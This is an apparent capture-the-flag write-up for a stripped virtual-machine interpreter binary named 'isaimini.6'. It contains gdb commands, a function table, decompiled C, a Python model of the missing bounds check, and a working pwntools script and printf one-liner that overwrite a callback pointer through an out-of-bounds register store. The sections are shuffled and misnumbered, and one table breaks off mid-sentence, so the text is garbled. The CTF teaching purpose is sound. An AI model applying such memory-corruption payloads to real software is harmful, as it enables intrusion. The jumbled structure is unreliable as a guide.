Isaimini.6

Success! If the real binary prints the flag, you will see it after `Success!`.

```
(gdb) file isaimini.6
(gdb) set disassembly-flavor intel
(gdb) break *0x00401430      # break at start of execute()
(gdb) run
(gdb) x/4gx $rsp             # view saved RIP after HLT
(gdb) x/gx 0x00603010        # examine callback after ST
(gdb) continue
```

You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10. When the interpreter reaches the final `if (callback)` check, it jumps to that address and prints the success message.

8. Full Exploit Script (Python / pwntools)

```python
#!/usr/bin/env python3
from pwn import *
```

```
regs[0]  -> 0x00602000
regs[1]  -> 0x00602008
...
regs[15] -> 0x00602078
regs[16] -> 0x00602080   <-- this is exactly the address of `callback`
```

Therefore, a store to r16 overwrites `callback` with the address of `win`.
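To make the aliasing concrete, here is a small Python model of the interpreter's register file and of the three opcodes the payload uses, added here as an example (it is not the write-up's own code). The opcode layout and the store semantics (ST copies the source register into the register-file slot named by its first operand) are assumptions read off the payload; the addresses are the write-up's. The `bounds_check=True` variant shows the index check the binary is missing.

```python
import struct

REG_COUNT = 16               # regs[0] .. regs[15] live at 0x602000 .. 0x602078
REGS_BASE = 0x602000
CALLBACK_ADDR = 0x602080     # regs[16] would land exactly on the callback slot
WIN_ADDR = 0x401b10

# The write-up's payload: MOV r1, win ; ST [r16], r1 ; HLT
PAYLOAD = b"\x01\x01" + struct.pack("<Q", WIN_ADDR) + b"\x05\x10\x01" + b"\x09"


def run_vm(code, bounds_check):
    """Interpret `code` on a model of the register file and return the callback slot.

    Registers and callback sit back to back, as in the binary, so an unchecked
    register index of 16 writes straight into callback.  With bounds_check=True
    the out-of-range store raises IndexError instead (the fix the binary lacks).
    """
    mem = bytearray(8 * (REG_COUNT + 1))          # 16 registers + callback slot

    def load(idx):
        return struct.unpack_from("<Q", mem, 8 * idx)[0]

    def store(idx, value):
        if bounds_check and not 0 <= idx < REG_COUNT:
            raise IndexError(f"register index {idx} out of range")
        struct.pack_into("<Q", mem, 8 * idx, value)

    pc = 0
    while pc < len(code):
        op = code[pc]
        if op == 0x01:                            # MOV rX, imm64 (little-endian)
            store(code[pc + 1], struct.unpack_from("<Q", code, pc + 2)[0])
            pc += 10
        elif op == 0x05:                          # ST [rDST], rSRC: slot DST <- rSRC
            store(code[pc + 1], load(code[pc + 2]))
            pc += 3
        elif op == 0x09:                          # HLT
            break
        else:
            raise ValueError(f"unknown opcode {op:#x} at offset {pc}")
    return load((CALLBACK_ADDR - REGS_BASE) // 8)  # slot 16 == callback


def callback_after(code, bounds_check):
    """Callback slot after running `code`, or None if the interpreter rejected a store."""
    try:
        return run_vm(code, bounds_check)
    except IndexError:
        return None
```

Without the check the payload leaves `0x401b10` in the callback slot; with it, the ST to slot 16 is rejected and the callback stays zero.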

| Address | Function |
|---------|----------|
| FUN_00401000 | entry point (main) |
| FUN_00401200 | parse_input |
| FUN_00401430 | execute |
| FUN_00401780 | op_add |
| FUN_00401810 | op_sub |
| FUN_004018c0 | op_load |
| FUN_00401950 | op_store |
| FUN_00401b10 | win |

```c
int main(void) {
    char buf[256];
    read(0, buf, 256);   /* user-supplied VM program */
    parse_input(buf);
    execute();
    puts("Failure!");    /* only win() prints the success message */
    return 0;
}
```

Putting it together (little‑endian encoding for the immediate):

The goal is to craft an input that makes the interpreter print `Success!`. The binary contains a hidden “secret” flag, but the only way to retrieve it is to cause the interpreter to call the function `win()` that prints the flag.

2. Files

| File | Description |
|------|-------------|
| isaimini.6 | 64‑bit ELF executable (stripped, no debug symbols). |
| input.txt | Empty starter file – you may ignore it and pipe your own payload to the binary. |

```python
binary = "./isaimini.6"     # target from the write-up
win_addr = 0x401b10         # address of win() (FUN_00401b10)

# Instead of assembling, we manually encode:
payload  = b"\x01\x01" + p64(win_addr)   # MOV r1, win
payload += b"\x05\x10\x01"               # ST [r16], r1 (write win → callback)
payload += b"\x09"                       # HLT

# Send payload
p = process(binary)
p.send(payload)
print(p.recvall().decode())
```

Running this script prints the flag (or “Success!”).

| Technique | Why it mattered |
|-----------|-----------------|
| Static analysis of a stripped binary | Ghidra’s decompiler can |

```bash
# Make the binary executable
chmod +x isaimini.6

# Build the payload with printf and pipe it straight into the binary.
# Do not capture it with $(...): command substitution drops the NUL bytes
# of the 64-bit immediate and the encoded program would be corrupted.
printf '\x01\x01\x10\x1b\x40\x00\x00\x00\x00\x00\x05\x10\x01\x09' | ./isaimini.6
```